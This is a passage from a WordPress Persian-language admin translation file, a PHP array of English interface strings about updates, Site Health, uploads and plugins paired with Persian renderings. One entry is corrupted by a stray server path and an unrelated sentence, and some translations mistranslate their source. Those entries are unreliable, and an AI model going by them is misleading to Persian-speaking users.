افزونه و پوسته اطمینان می دهد که همیشه تازه‌ترین نگارش‌ها نصب شده‌اند.','Plugin and theme auto-updates appear to be configured correctly'=>'نمایش به‌روزرسانی خودکار افزونه و پوسته به درستی پیکربندی شده است','themeActivate “%s”'=>'فعال‌سازی “%s”','Sorry, you are not allowed to modify plugins.'=>'با عرض پوزش، شما اجازهٔ تغییر افزونه‌ها را ندارید.','The setting for %1$s is smaller than %2$s, this could cause some problems when trying to upload files.'=>'تنظیمات برای %1$s و %2$s یکسان نیستند، این می‌تواند باعث ایجاد برخی مشکلات هنگام بارگذاری پرونده‌ها شود.','%1$s is set to %2$s. You won\'t be able to upload files on your site.'=>'%1$s به %2$s تنظیم شد. شما قادر به بارگذاری پرونده در سایتتان نیستید.','The %s function has been disabled, some media settings are unavailable because of this.'=>'تابع %s غیرفعال است، به همین خاطر برخی تنظیمات رسانه در دسترس نیست.','The %1$s directive in %2$s determines if uploading files is allowed on your site.'=>'راهنمای %1$s در %2$s مشخص می‌کند که بارگذاری پرونده‌ها در سایت شما مجاز است.','Files can be uploaded'=>'پرونده‌ها قابل بارگذاری هستند','Max effective file size'=>'حداکثر موثر اندازه پرونده','Max size of an uploaded file'=>'حداکثر اندازهٔ پروندهٔ بارگذاری شده','Max size of post data allowed'=>'حداکثر اندازهٔ مجاز دادهٔ نوشته','File uploads'=>'بارگذاری پرونده','File upload settings'=>'تنظیمات بارگذاری پرونده','themeCannot Install %s'=>'%s نمی‌تواند نصب شود','pluginInstall %s'=>'نصب %s','themeInstall %s'=>'نصب %s','themeUpdate %s now'=>'هم‌اکنون %s را به‌روزرسانی نمایید','- %1$s version %2$s'=>'- %1$s نگارش %2$s','themeActivated'=>'فعال شده','Sorry, you are not allowed to enable themes automatic updates.'=>'با عرض پوزش، شما مجاز به فعال‌سازی به‌روزرسانی‌های خودکار پوسته‌ها نیستید.','This plugin is already installed.'=>'افزونه در حال حاضر نصب شده است.','pluginUpdate %s now'=>'%s را هم‌اکنون به‌روزرسانی نمایید','pluginInstall %s now'=>'هم‌اکنون %s را نصب نمایید','Dismiss this notice.'=>'رد کردن این اخطار','themeCannot Activate %s'=>'نمی‌توان %s را فعال کرد','Theme will no longer be auto-updated.'=>'پوسته دیگر به‌روزرسانی خودکار نخواهد شد.','Theme will be auto-updated.'=>'پوسته به طور خودکار به‌روزرسانی خواهد شد.','Auto-updates can be enabled or disabled for each individual theme. Themes with auto-updates enabled will display the estimated date of the next auto-update. Auto-updates depends on the WP-Cron task scheduling system.'=>'به‌روزرسانی‌های خودکار می‌توانند برای هر پوسته‌ای جداگانه فعال یا غیرفعال شوند. پوسته‌ها با به‌روزرسانی خودکار فعال تاریخ تخمینی به‌روزرسانی خودکار بعدی را نشان می‌دهند. به‌روزرسانی‌های خودکار به سیستم زمان‌بندی کار WP-Cron بستگی دارند.','Sorry, you are not allowed to disable themes automatic updates.'=>'با عرض پوزش، شما اجازهٔ غیرفعال نمودن به‌روزرسانی‌های خودکار پوسته‌ها را ندارید.','Sorry, you are not allowed to manage plugins automatic updates.'=>'با عرض پوزش، شما اجازهٔ مدیریت به‌روزرسانی خودکار افزونه‌ها را ندارید.','Error in deleting the item.'=>'خطا در پاک کردن مورد.','Error in restoring the item from Trash.'=>'خطا در بازیابی مورد از زباله‌دان.','Error in moving the item to Trash.'=>'خطا در انتقال مورد به زباله‌دان.','Selected plugins will no longer be auto-updated.'=>'افزونه‌های انتخاب شده دیگر به طور خودکار به‌روزرسانی نخواهند شد.','Selected plugins will be auto-updated.'=>'افزونه‌های انتخاب شده به طور خودکار به‌روزرسانی خواهند شد.','Plugin will no longer be auto-updated.'=>'افزونه‌ها دیگر به طور خودکار به‌روزرسانی نخواهند شد.','Plugin will be auto-updated.'=>'افزونه‌ها به طور خودکار به‌روزرسانی خواهند شد.','Auto-updates can be enabled or disabled for each individual plugin. Plugins with auto-updates enabled will display the estimated date of the next auto-update. Auto-updates depends on the WP-Cron task scheduling system.'=>'به‌روزرسانی‌های خودکار می‌توانند برای هر افزونه‌ای جداگانه فعال یا غیرفعال شوند. افزونه‌ها با به‌روزرسانی خودکار فعال تاریخ تخمینی به‌روزرسانی خودکار بعدی را نشان می‌دهند. به‌روزرسانی‌های خودکار به سیستم زمان‌بندی کار WP-Cron بستگی دارند.','Please connect to your network admin to manage plugins automatic updates.'=>'لطفاً برای مدیریت به‌روزرسانی‌های خودکار افزونه‌ها به مدیر شبکه خود وصل شوید.','The admin email verification page will reappear after %s.'=>'برگهٔ تأیید ایمیل مدیر پس از %s دوباره نمایش داده می‌شود.','Auto-updates'=>'به‌روزرسانی‌های خودکار','Please note: Third-party themes and plugins, or custom code, may override WordPress scheduling.'=>'لطفا توجه داشته باشید: افزونه و پوسته‌های جانبی، یا کدهای دلخواه، ممکن است رمانبندی وردپرس را بازنویسی کنند.','Auto-updates can be enabled or disabled for WordPress major versions and for each individual theme or plugin. Themes or plugins with auto-updates enabled will display the estimated date of the next auto-update. Auto-updates depends on the WP-Cron task scheduling system.'=>'به‌روزرسانی‌های خودکار می‌توانند برای هر پوسته یا افزونه‌ای جداگانه فعال یا غیرفعال شوند. پوسته‌ها یا افزونه‌ها با به‌روزرسانی خودکار فعال تاریخ تخمینی به‌روزرسانی خودکار بعدی را نشان می‌دهند. به‌روزرسانی‌های خودکار به سیستم زمان‌بندی کار WP-Cron بستگی دارند.','Important: Before updating, please back up your database and files. For help with updates, visit the Updating WordPress documentation page.'=>'مهم: قبل از به‌روزرسانی، لطفا از پرونده‌ها و پایگاه‌داده‌تان پشتیبان بگیرید. برای کمک در مورد به‌روزرسانی‌ها، برگه مستندات به‌روزرسانی وردپرس را ببینید.','themeCannot Activate'=>'نمی‌توان فعال نمود','You cannot edit this comment because the associated post is in the Trash. Please restore the post first, then try again.'=>'شما نمی‌توانید این دیدگاه را ویرایش کنید زیرا نوشته مرتبط در زباله‌دان است. لطفا ابتدا نوشته را بازیافت، سپس دوباره تلاش کنید.','media itemSuccess'=>'موفقیت آمیز','pluginError: Current WordPress version (%1$s) does not meet minimum requirements for %2$s. The plugin requires WordPress %3$s.'=>'خطا: نگارش فعلی وردپرس (%1$s) حداقل نیازمندی‌های لازم برای %2$s را ندارد. افزونه نیازمند وردپرس %3$s است.','pluginError: Current PHP version (%1$s) does not meet minimum requirements for %2$s. The plugin requires PHP %3$s.'=>'خطا: نگارش فعلی PHP (%1$s) حداقل نیازمندی‌های لازم برای %2$s را ندارد. افزونه نیازمند PHP %3$s است.','pluginError: Current versions of WordPress (%1$s) and PHP (%2$s) do not meet minimum requirements for %3$s. The plugin requires WordPress %4$s and PHP %5$s.'=>'خطا: نگارش فعلی وردپرس (%1$s) و PHP (%2$s) حداقل نیازمندی‌های لازم برای %3$s را ندارد. افزونه نیازمند وردپرس %4$s و PHP %5$s است.','Invalid data. The item does not exist.'=>'داده نامعتبر است. مورد وجود ندارد.','Invalid data. Unknown type.'=>'داده نامعتبر است. نوع ناشناخته است.','Invalid data. Unknown state.'=>'داده نامعتبر است. حالت ناشناخته است.','Invalid data. No selected item.'=>'داده نامعتبر است. موردی انتخاب نشده است.','You cannot reply to a comment on a draft post.'=>'نمی‌توانید به دیدگاهی که در پیش‌نویس است پاسخ دهید.','To manage themes on your site, visit the Themes page: %s'=>'برای مدیریت پوسته‌ها در سایتتان، برگهٔ پوسته‌ها را ببینید: %s','To manage plugins on your site, visit the Plugins page: %s'=>'برای مدیریت افزونه‌ها در سایت، برگهٔ افزونه‌ها را ببینید: %s','These themes are now up to date:'=>'هم‌اکنون این پوسته‌ها به‌روز هستند:','These plugins are now up to date:'=>'هم‌اکنون این افزونه‌ها به‌روز هستند:','These themes failed to update:'=>'به‌روزرسانی این پوسته‌ها ناموفق بود:','Please check your site now. It’s possible that everything is working. If there are updates available, you should update.'=>'لطفاً اکنون سایت خود را بررسی نمایید. ممکن است که همه چیز کار کند. اگر به‌روزرسانی‌هایی موجود است، باید به‌روزرسانی نمایید.','Howdy! Themes failed to update on your site at %s.'=>'درود! به‌روزرسانی پوسته‌ها در سایت شما در %s ناموفق بود.','[%s] Some themes have failed to update'=>'[%s] به‌روزرسانی برخی از پوسته‌ها ناموفق بود','Howdy! Plugins failed to update on your site at %s.'=>'درود! به‌روزرسانی افزونه‌ها در سایت شما در %s ناموفق بود.','[%s] Some plugins have failed to update'=>'[%s] به‌روزرسانی برخی از افزونه‌ها ناموفق بود','Howdy! Plugins and themes failed to update on your site at %s.'=>'درود! به‌روزرسانی افزونه‌ها و پوسته‌ها در سایت شما در %s ناموفق بود.','[%s] Some plugins and themes have failed to update'=>'[%s] به‌روزرسانی برخی از افزونه‌ها و پوسته‌ها ناموفق بود','Howdy! Some themes have automatically updated to their latest versions on your site at %s. No further action is needed on your part.'=>'درود! برخی از پوسته‌های درون سایت شما %s به طور خودکار به آخرین نگارش‌هایشان به‌روز شدند. هیچ اقدام دیگری از سوی شما نیاز نیست.','[%s] Some themes were automatically updated'=>'[%s] برخی از پوسته‌ها به طور خودکار به‌روز شده‌اند','Howdy! Some plugins have automatically updated to their latest versions on your site at %s. No further action is needed on your part.'=>'درود! برخی از افزونه‌های درون سایت شما %s به طور خودکار به آخرین نگارش‌هایشان به‌روز شدند. هیچ اقدام دیگری از سوی شما نیاز نیست.','[%s] Some plugins were automatically updated'=>'[%s] برخی از افزونه‌ها به طور خودکار به‌روز شده‌اند','Howdy! Some plugins and themes have automatically updated to their latest versions on your site at %s. No further action is needed on your part.'=>'درود! برخی از افزونه‌ها و پوسته‌های درون سایت شما %s به طور خودکار به آخرین نگارش‌هایشان به‌روز شدند. هیچ اقدام دیگری از سوی شما نیاز نیست.','[%s] Some plugins and themes have automatically updated'=>'[%s] برخی از افزونه‌ها و پوسته‌ها بصورت خودکار به‌روز‌رسانی شدند','Move %s box down'=>'جعبهٔ %s را به پایین انتقال دهید','Move %s box up'=>'جعبهٔ %s را به بالا انتقال دهید','commentNot spam'=>'جفنگ نیست','PHP Sessions'=>'نشست PHP','A PHP session was created by a %1$s function call. This interferes with REST API and loopback requests. The session should be closed by %2$s before making any HTTP requests.'=>'نشست PHP توسط یک %1$s فراخوانی تابع ایجاد شده است. این با REST API و درخواست‎های حلقه‌بازگشت تداخل می‌کند. این نشست باید توسط %2$s قبل از ایجاد هر درخواست HTTP بسته شود.','An active PHP session was detected'=>'یک نشست فعال PHP پیدا شد','PHP sessions created by a %1$s function call may interfere with REST API and loopback requests. An active session should be closed by %2$s before making any HTTP requests.'=>'نشست‌های PHP ایجاد شده توسط یک %1$s فراخوانی تابع ممکن است با REST API و درخواست‎های حلقه‌بازگشت تداخل کند. نشست فعال باید توسط %2$s قبل از ایجاد هر درخواست HTTP بسته شود.','No PHP sessions detected'=>'نشست PHP شناسایی نشد','Extended view'=>'نمایش وسیع','Compact view'=>'نمایش فشرده','Error: Passwords do not match. Please enter the same password in both password fields.'=>'خطا: رمزها هم‌خوانی ندارند. لطفاً رمزهای یکسان را در هر دو کادر وارد نمایید.','post action/button labelSchedule'=>'زمان‌بندی','No plugins found. Try a different search.'=>'هیچ افزونه‌ای پیدا نشد. جستجوی دیگری انجام دهید.','Automatic update scheduled in %s.'=>'به‌روزرسانی خودکار برنامه‌ریزی شده در %s.','Automatic update overdue by %s. There may be a problem with WP-Cron.'=>'به‌روزرسانی‌های خودکار توسط %s تاخیر افتاده است. این ممکن است مشکلی از WP-Cron باشد.','Automatic update not scheduled. There may be a problem with WP-Cron.'=>'به‌روزرسانی خودکار زمان‌بندی نشده است. ممکن است در WP-Cron مشکلی وجود داشته باشد.','You are updating a plugin. Be sure to back up your database and files first.'=>'شما در حال به‌روزرسانی یک افزونه هستید. مطمئن شوید ابتدا از پایگاه‌داده و پرنده‌هایتان پشتیبان بگیرید.','You are uploading an older version of a current plugin. You can continue to install the older version, but be sure to back up your database and files first.'=>'شما در حال بارگذاری یک نگارش قدیمی از افزونه فعلی هستید. شما می‌توانید نگارش قدیمی‌تر را نصب کنید، اما مطمئن شوید ابتدا از پایگاه‌داده و پرنده‌هایتان پشتیبان بگیرید.','Your WordPress version is %1$s, however the uploaded plugin requires %2$s.'=>'نگارش وردپرس شما %1$s است، اما افزونه بارگذاری شده نیازمند %2$s است.','The PHP version on your server is %1$s, however the uploaded plugin requires %2$s.'=>'نگارش PHP روی سرور شما %1$s است، در حالی که پوسته بارگذاری شده نیازمند %2$s است.','The plugin cannot be updated due to the following:'=>'افزونه به دلایل زیر نمی‌تواند به‌روزرسانی شود:','Plugin name'=>'نام افزونه','Theme downgraded successfully.'=>'پوسته با موفقیت به نگارش قبل بازگشت.','Theme downgrade failed.'=>'بازگشت به نسخه قبل پوسته ناموفق بود.','Downgrading the theme…'=>'بازگشت به نسخه قبل پوسته…','Updating the theme…'=>'در حال به‌روزرسانی پوسته…','The active theme has the following error: "%s".'=>'پوستهٔ فعال خطای زیر را دارد: "%s".','Enable auto-updates'=>'فعال‌سازی به‌روزرسانی‌‌های خودکار','Disable auto-updates'=>'غیرفعال‌سازی به‌روزرسانی‌‌های خودکار','Disable Auto-updates'=>'غیر فعال نمودن به‌روزرسانی خودکار','Enable Auto-updates'=>'فعال‌سازی به‌روزرسانی خودکار','Auto-updates Disabled (%s)'=>'به‌روزرسانی غیرفعال است (%s)','Auto-updates Enabled (%s)'=>'به‌روزرسانی فعال است (%s)','Automatic Updates'=>'به‌روزرسانی‌های خودکار','No plugins are currently available.'=>'هیچ افزونه‌ای در حال حاضر در دسترس نیست.','Restore original image'=>'بازیافت تصویر اصلی','The uploaded file has expired. Please go back and upload it again.'=>'پروندهٔ بارگذاری شده منقضی شده است. لطفاً برگردید و دوباره بارگذاری نمایید.','Cancel and go back'=>'لغو نمایید و بازگردید','themeReplace installed with uploaded'=>'بارگذاری شده را جایگزین فعلی نمایید','You are updating a theme. Be sure to back up your database and files first.'=>'شما در حال به‎روزرسانی یک پوسته هستید. مطمئن شوید ابتدا از پایگاه‌داده و پرنده‌هایتان پشتیبان بگیرید.','You are uploading an older version of the installed theme. You can continue to install the older version, but be sure to back up your database and files first.'=>'شما در حال بارگذاری نسخه‌ای قدیمی‌تر از پوستهٔ نصب‌شده هستید. می‌توانید نصب نسخهٔ قدیمی‌تر را ادامه دهید، اما حتماً ابتدا از پایگاه داده و پرونده‌های خود نسخهٔ پشتیبان تهیه نمایید.','Your WordPress version is %1$s, however the uploaded theme requires %2$s.'=>'نگارش وردپرس شما %1$s است، اما پوسته بارگذاری شده نیازمند %2$s است.','The PHP version on your server is %1$s, however the uploaded theme requires %2$s.'=>'نگارش PHP روی سرور شما %1$s است، در حالی که برای بارگذاری پوسته %2$s نیاز است.','The theme cannot be updated due to the following:'=>'پوسته به دلایل زیر نمی‌تواند به‌روزرسانی شود:','(not found)'=>'(پیدا نشد)','Required PHP version'=>'نگارش PHP مورد نیاز','Required WordPress version'=>'نگارش WordPress مورد نیاز','Theme name'=>'نام پوسته','themeCannot Install'=>'نمی‌تواند نصب شود','Block Editor Patterns'=>'الگوهای ویرایشگر بلوک','Plugin downgraded successfully.'=>'بازگشت به نگارش قبلی افزونه موفقیت‌آمیز بود.','Plugin downgrade failed.'=>'بازگشت به نسخه قبل افزونه ناموفق بود.','Downgrading the plugin…'=>'بازگشت به نسخه قبل افزونه…','Updating the plugin…'=>'در حال به‌روزرسانی افزونه…','Could not remove the current plugin.'=>'نگارش فعلی افزونه پاک نمی‌شود.','Removing the current plugin…'=>'حذف نمودن افزونه فعلی…','Auto-update'=>'به‌روزرسانی خودکار','Auto-updates disabled'=>'به‌روز‌رسانی خودکار غیرفعال است ','Auto-updates enabled'=>'به‌روزرسانی فعال است','Are pretty permalinks supported?'=>'آیا پیوندهای یکتای زیبا پشتیبانی می‌شود؟','PHP memory limit (only for admin screens)'=>'محدودیت حافظهٔ PHP (فقط برای مدیر بخش)','Is this site discouraging search engines?'=>'آیا این سایت از موتورهای جستجو جلوگیری می‌کند؟','Wide Blocks'=>'بلوک‌های عریض','Block Editor Styles'=>'شیوه‌نامه‌های ویرایشگر بلوک','Spam'=>'جفنگ','Unable to write to %s file.'=>'قادر به نوشتن در پرونده %s نیستیم.','Error: The %s options page is not in the allowed options list.'=>'خطا: برگه گزینه‌های %s در لیست مجاز گزینه‌ها پیدا نشد.','Error:'=>'خطا:','You should update your %s file now.'=>'شما اکنون باید پرونده %s خود را به‎روزرسانی نمایید.','This localized version contains both the translation and various other localization fixes.'=>'این نگارش بومی شده حاوی ترجمه و اصلاحات بومی‌سازی دیگر است.','Take a look at the %1$d item on the Site Health screen.'=>'نگاهی بیاندازید به گزینه %1$d در صفحه سلامت سایت.','Your site’s health is looking good, but there are still some things you can do to improve its performance and security.'=>'سلامتی سایت شما به نظر خوب است، اما هنوز مواردی وجود دارد که می توانید برای بهبود عملکرد و امنیت آن انجام دهید.','Great job! Your site currently passes all site health checks.'=>'کارت عالی بود! سایت شما درحال‎حاضر همه بررسی‎های سلامت سایت را گذراند.','Your site has critical issues that should be addressed as soon as possible to improve its performance and security.'=>'سایت شما دارای مسائل مهمی است که باید در اسرع وقت بهبود عملکرد و امنیت آن مورد بررسی قرار گیرد.','Site health checks will automatically run periodically to gather information about your site. You can also visit the Site Health screen to gather information about your site now.'=>'بررسی سلام سایت بطور دوره‌ای اجرا می‌شود تا اطلاعات درباره سایت شما را جمع‌آوری کند. شما همچنین می‌توانید برای جمع‌آوری اطلاعات در مورد سایتتان هم‌اکنون صفحه سلامت سایت را مشاهده کنید.','No information yet…'=>'هنوز اطلاعاتی نیست…','The uploaded file exceeds the %1$s directive in %2$s.'=>'پرونده بارگذاری شده بزرگ‌تر از %1$s در %2$s است.','No comments found in Trash.'=>'هیچ دیدگاهی در زباله‌دان یافت نشد.','File is empty. Please upload something more substantial. This error could also be caused by uploads being disabled in your %1$s file or by %2$s being defined as smaller than %3$s in %1$s.'=>'پرونده خالی است. لطفاً چیز قابل قبولی بارگذاری نمایید. این خطا ممکن است به‌خاطر غیرفعال کردن بارگذاری در پرونده‌ %1$s شما یا به‌ خاطر تعریف %2$s کوچک‌تر از %3$s در %1$s باشد.','A test is unavailable'=>'آزمایش در دسترس نیست','Error: %1$s (%2$s)'=>'خطا: %1$s (%2$s)','Your site is running on an older version of PHP (%s), which should be updated'=>'سایت شما نسخه قدیمی PHP (%s) را اجرا می‎کند، که باید به‌روزرسانی شود','Your site is running on an older version of PHP (%s)'=>'سایت شما نسخه قدیمی PHP (%s) را اجرا می‎کند','Your site is running a recommended version of PHP (%s)'=>'سایت شما در حال اجرای پیشنهادی PHP (%s) است','No media files found in Trash.'=>'پرونده چندرسانه‎ای در زباله‎دان وجود ندارد.','%1$s %2$d – %3$s %4$d, %5$d'=>'%1$s %2$d – %3$s %4$d, %5$d','upcoming events year formatY'=>'Y','upcoming events day formatj'=>'j','%1$s %2$d–%3$d, %4$d'=>'%1$s %2$d–%3$d, %4$d','upcoming events month formatF'=>'F','Resend confirmation requests'=>'ارسال دوبارهٔ تاییدیهٔ درخواست‌ها','Delete requests'=>'حذف درخواست‌ها','Table prefix'=>'پیشوند جدول','PHP Default Timezone'=>'منطقه زمانی پیشفرض PHP','PHP default timezone was changed after WordPress loading by a %s function call. This interferes with correct calculations of dates and times.'=>'منطقه زمانی پیشفرض PHP پس از بارگذاری وردپرس با فراخوانی %s تابع تغییر یافته است. /home/filetir/public_html/wp-content/languages/admin-fa_IR.l10n.php:هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد.','All automatic updates are disabled.'=>'همه به‌روزرسانی‌های خودکار غیر فعال هستند.','Database collation'=>'چیده شدن پایگاه‌داده','Database charset'=>'نویسه پایگاه‌داده','Inactive Themes'=>'پوسته غیر فعال','Parent Theme'=>'پوسته‌ٔ مادر','Drop-ins are single files, found in the %s directory, that replace or enhance WordPress features in ways that are not possible for traditional plugins.'=>'جایگزین‌ها پرونده‌‌های مجزا هستند، که در پوشهٔ %s یافت می‌شوند، و ویژگی‌های وردپرس را بهبود می‌بخشند که این کار برای افزونه‌های سنتی ورپرس ممکن نیست.','personal data group descriptionOverview of export report.'=>'گزارش اجمالی برون‌بری.','Documentation on Writing Settings'=>'مستندات تنظیمات نوشتن','Documentation on Tags'=>'مستندات برچسب‌ها','Documentation on Categories'=>'مستندات دسته‌ها','Your theme determines how content is displayed in browsers. Learn more about feeds.'=>'پوستهٔ شما چگونگی نمایش محتوا در مرورگرها را مشخص می‌کند. یادگیری بیشتر دربارهٔ خوراک‌ها','For each post in a feed, include'=>'برای هر نوشته در خوراک، شامل','Warning: these pages should not be the same as your Privacy Policy page!'=>'هشدار: این برگه‌ها نباید همانند برگهٔ سیاست حفظ حریم خصوصی شما باشند!','Documentation on Reading Settings'=>'مستندات تنظیمات خواندن','[%s] Delete My Site'=>'[%s] حذف سایت من','Allow people to submit comments on new posts'=>'اجازه به دیگران برای ثبت دیدگاه‌ها روی نوشته‌های تازه','Default post settings'=>'تنظیمات پیش‌فرض نوشته','You can change your profile picture on Gravatar.'=>'می‌توانید عکس شناسنامهٔ خود را در گراواتار تغییر دهید.','Plugin resumed.'=>'افزونه از سر گرفته شد.','Selected plugins deactivated.'=>'افزونه‌های انتخاب‌شده غيرفعال شدند.','Plugin deactivated.'=>'افزونه غیر فعال شد.','Selected plugins activated.'=>'افزونه‌های انتخاب‌شده فعال شدند.','Plugin activated.'=>'افزونه فعال شد.','The selected plugins have been deleted.'=>'افزونه‌های انتخاب‌شده حذف‌شده‌اند.','The selected plugin has been deleted.'=>'افزونه انتخاب‌شده حذف شده است.','The plugin %1$s has been deactivated due to an error: %2$s'=>'افزونهٔ %1$s به خاطر یک خطا غیر فعال شده است: %2$s','If you need to tweak more than your theme’s CSS, you might want to try making a child theme.'=>'اگر نیاز به تنظیم بیشتر CSS پوستهٔ خود را دارید، می‌توانید ساخت یک پوستهٔ فرزند را امتحان نمایید.','You appear to be making direct edits to your theme in the WordPress dashboard. It is not recommended! Editing your theme directly could break your site and your changes may be lost in future updates.'=>'به نظر می‌رسد که شما در حال ویرایش مستقیم پوسته‌تان در پیشخوان وردپرس هستید. پیشنهاد نمی‌شود! ویرایش پوسته‌تان به‌صورت مستقیم می‌تواند سایتتان را خراب کند و تغییرات شما در به‌روزرسانی‌های آینده از دست برود.','draft_length10'=>'10','File does not exist! Please double check the name and try again.'=>'پرونده وجود ندارد! لطفاً نام را دوباره بررسی نمایید و دوباره تلاش نمایید.','%1$s needs to be a %2$s object.'=>'%1$s لازم است یک شیء %2$s باشد.','You are in recovery mode. This means there may be an error with a theme or plugin. To exit recovery mode, log out or use the Exit button. Exit Recovery Mode'=>'شما در حالت بازیابی هستید. این بدان‌معناست که شاید خطایی در یک پوسته یا افزونه وجود دارد. برای خروج از حالت بازیابی، خارج شوید یا از دکمه خروج استفاده نمایید. خروج از حالت بازیابی','Site HealthInfo'=>'اطلاعات','Site HealthStatus'=>'وضعیت','Themes directory location'=>'مکان پوشه پوسته‌ها','comment statusClosed'=>'بسته شده','%s critical issue'=>'%s مشکل بحرانی','https://wordpress.org/documentation/article/updating-wordpress/'=>'https://wordpress.org/documentation/article/updating-wordpress/','Get help resolving this issue.'=>'دریافت راهنمایی برای برطرف کردن این مشکل','Learn more about what WordPress requires to run.'=>'مطالعه بیشتر درباره چیزهایی که وردپرس برای اجراشدن نیاز دارد.','https://wordpress.org/about/requirements/'=>'https://fa.wordpress.org/about/requirements/','The SQL server is a required piece of software for the database WordPress uses to store all your site’s content and settings.'=>'سرور SQL نیازمند تعدادی نرم‌افزار برای پایگاه‌داده وردپرس است که برای ذخیره محتوا و تنظیمات سایت شما استفاده می‌نماید.','PHP modules perform most of the tasks on the server that make your site run. Any changes to these must be made by your server administrator.'=>'ماژول‌های PHP بیشتر وظیفه‌های در سرور که باعث اجرای سایت شما می‌شوند را انجام می‌دهند. هر تغییری بر روی این‌ها باید توسط مدیر سرور شما انجام شود.','Manage your themes'=>'مدیریت پوسته‌های شما','Manage inactive plugins'=>'مدیریت افزونه‌های غیر فعال','Update your plugins'=>'به‌روزرسانی افزونه‌های شما','Manage your plugins'=>'مدیریت افزونه‌های شما','View Privacy Policy Guide.'=>'مشاهده راهنمای سیاست حفظ حریم خصوصی','User Language'=>'زبان کاربر','The value, %1$s, has either been enabled by %2$s or added to your configuration file. This will make errors display on the front end of your site.'=>'مقدار، %1$s، توسط %2$s فعال یا به پرونده پیکربندی شما افزوده شده است. این باعث نمایش خطاها در بخش کاربری سایت شما می‌شود.','[%s] Background Update Finished'=>'[%s] به‌روزرسانی پس‌زمینه به پایان رسید','[%s] Background Update Failed'=>'[%s] به‌روزرسانی پس‌زمینه ناموفق بود','Plugin could not be resumed because it triggered a fatal error.'=>'افزونه نمی‌تواند به کار خود ادامه دهد زیرا باعث یک خطای مهلک شد.','You should remove inactive themes'=>'شما باید پوسته‌های غیر فعال را پاک کنید','Your site has 1 installed theme, and it is up to date.'=>'سایت شما 1 پوسته نصب شده دارد، و آن به‌روز است.','Your site has 1 active plugin, and it is up to date.'=>'سایت شما 1 افزونه نصب شده دارد، و آن به‌روز است. ','Passed tests'=>'آزمایش‌های قبول شده','Sorry, you are not allowed to access site health information.'=>'با عرض پوزش، شما دسترسی مجاز به اطلاعات سلامت سایت را ندارید.','Copy site info to clipboard'=>'کپی اطلاعات سایت به کلیپ برد','If you want to export a handy list of all the information on this page, you can use the button below to copy it to the clipboard. You can then paste it in a text file and save it to your device, or paste it in an email exchange with a support engineer or theme/plugin developer for example.'=>'اگر می‌خواهید که یک فهرست از همه اطلاعات این برگه را برون‌بری نمایید، می‌توانید از دکمه زیر برای کپی آن در کلیپ‌بورد استفاده نمایید. سپس می‌توانید این را در یک پرونده‌ متنی بچسبانید و در دستگاه خود ذخیره نمایید، یا آن را به عنوان نمونه در یک ایمیل برای تبادل با یک مهندس پشتیبانی یا توسعه دهنده پوسته/افزونه بچسبانید.','The Site Health check requires JavaScript.'=>'سلامت سایت جاوااسکریپت‌های لازم را بررسی می‌نماید.','Site Health Info'=>'اطلاعات سلامت سایت','This update does not work with your version of PHP.'=>'این به‌روزرسانی با نگارش PHP شما کار نمی‌کند.','All formats'=>'همه ساختارها','Filter by post format'=>'صافی بر اساس ساختار نوشته','Go to the Plugins screen'=>'رفتن به صفحه افزونه‌ها','The authenticity of %s could not be verified.'=>'اعتبار %1$s را نمی‌توان تایید کرد.','The authenticity of %s could not be verified as no signature was found.'=>'اعتبار %1$s را نمی‌توان تایید کرد زیرا امضایی یافت نشد.','The authenticity of %s could not be verified as signature verification is unavailable on this system.'=>'اعتبار %1$s را نمی‌توان تایید کرد زیرا تاییدیه امضا در این سیستم در دسترس نیست.','Eraser callback is not valid: %s.'=>'فراخوان پاک‌کننده معتبر نیست: %s','Eraser does not include a callback: %s.'=>'پاک‌کننده شامل یک فراخوان نیست: %s.','Sorry, you are not allowed to perform this action.'=>'با عرض پوزش، شما مجاز به انجام این عمل نیستید.','HTTP requests have been blocked by the %1$s constant, with some allowed hosts: %2$s.'=>'درخواست‌های HTTP توسط ثابت %1$s مسدود شده، در برخی میزبان‌ها اجازه داده شده: %2$s.','HTTP requests have been blocked by the %s constant, with no allowed hosts.'=>'درخواست‌های HTTP توسط ثابت %s مسدود شده، هیچ میزبانی اجازه نداده.','You are using a %1$s drop-in which might mean that a %2$s database is not being used.'=>'شما از جایگزین %1$s استفاده می‌کنید که شاید به معنی این باشد که پایگاه‌داده %2$s استفاده نشده‌است.','https://make.wordpress.org/hosting/handbook/handbook/server-environment/#php-extensions'=>'https://make.wordpress.org/hosting/handbook/handbook/server-environment/#php-extensions','The WordPress Hosting Team maintains a list of those modules, both recommended and required, in the team handbook%3$s.'=>'تیم میزبانی وردپرس یک فهرست از این ماژول‌ها را در کتابچه تیم%3$s نگه‌می‌دارد، که هم پیشنهادشده و ضروری است.','Performance'=>'کارایی','Your site has %1$d inactive theme, other than %2$s, the default WordPress theme, and %3$s, your active theme.'=>'سایت شما %1$d پوسته غیرفعال دارد. غیر از %2$s، پوسته پیش‌فرض وردپرس، و %3$s، پوسته فعال شما.','You should consider removing any unused themes to enhance your site’s security.'=>'باید در نظر بگیرید که هر پوسته استفاده نشده‌ای را پاک نمایید تا امنیت سایت شما افزایش یابد.','Your site has %1$d inactive theme, other than %2$s, your active theme.'=>'سایت شما %1$d پوسته غیرفعال، غیر از %2$s، پوسته فعال شما دارد.','Your site has %d inactive theme.'=>'سایت شما %d پوسته غیر فعال دارد.','Inactive plugins are tempting targets for attackers. If you are not going to use a plugin, you should consider removing it.'=>'افزونه‌های غیرفعال اهداف وسوسه‌انگیزی برای حمله‌کنندگان هستند. اگر شما از افزونه‌ای استفاده نمی‌کنید، باید در نظر بگیرید که آن‌را پاک نمایید.','Your site has %d inactive plugin.'=>'سایت شما %d افزونه غیر فعال دارد.','Security'=>'امنیت','Erase personal data list'=>'پاک کردن فهرست داده‌های شخصی','Erase personal data list navigation'=>'راهبری فهرست پاک‌سازی داده‌های شخصی','Filter erase personal data list'=>'صافی فهرست پاک‌سازی داده‌های شخصی','Export personal data list'=>'فهرست برون‌بری داده‌های شخصی','Export personal data list navigation'=>'راهبری فهرست برون‌بری داده‌های شخصی','Filter export personal data list'=>'صافی فهرست برون‌بری داده‌های شخصی','There is a new version of %1$s available, but it does not work with your version of PHP. View version %4$s details or learn more about updating PHP.'=>'نگارش جدیدی از %1$s در دسترس است، اما با نگارش PHP شما کار نمی‌کند. مشاهده جزئیات نگارش %4$s یا درمورد به‌روزرسانی PHP بیشتر بدانید.','This plugin failed to load properly and is paused during recovery mode.'=>'این افزونه به درستی بارگذاری نشد و در حین حالت ترمیم متوقف شد.','Go to the Themes screen'=>'رفتن به صفحه پوسته‌ها','Total size is not available. Some errors were encountered when determining the size of your installation.'=>'اندازه 